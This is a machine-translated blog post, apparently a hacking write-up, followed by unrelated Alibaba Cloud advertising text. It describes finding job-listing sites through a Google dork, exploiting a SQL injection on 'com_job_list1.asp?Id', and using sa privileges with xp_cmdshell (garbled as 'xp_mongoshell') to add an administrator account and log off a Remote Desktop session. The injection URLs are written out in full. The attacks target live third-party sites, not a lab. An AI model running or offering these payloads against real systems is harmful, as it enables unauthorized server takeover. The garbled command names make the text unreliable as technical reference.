Alimail
A boring test. I have a power outage over the past few days! It was hard to get the electricity. I quickly pulled out the source code. After a brief look, I found an injection point and went to google for practice. I will publish this article here. Google: inurl: com_job_list1.asp? Id can be injected. It is the source code of a talent network. Find an injection point. In the ah d detection, the sa permission is applied. I remember someone said that a website with no sa permissions can only indicate your technical problems.
Since it is the sa permission, I certainly can't let it go. After listing the directory, I found that I couldn't. At this time, I thought of xp_mongoshell. Because I didn't show back in ah d, I manually tested it.
Submit http://www.xxx.com/com_job_list1.asp? Id = 6228 and 1 = (select count (*) FROM master. dbo. sysobjects where xtype = x and name = xp_mongoshell)
Returns normal,
Hurry to add an account first, http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell net user shaun 111/add ;--
Add as Administrator Group
Http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell net localgroup administrators shaun/add ;--
Remote Desktop can be connected, but login prompt Remote Server exceeds the maximum number of allowed connections, mlgb, kill a, http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell logoff 1 ;--
You can log on normally this time,
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
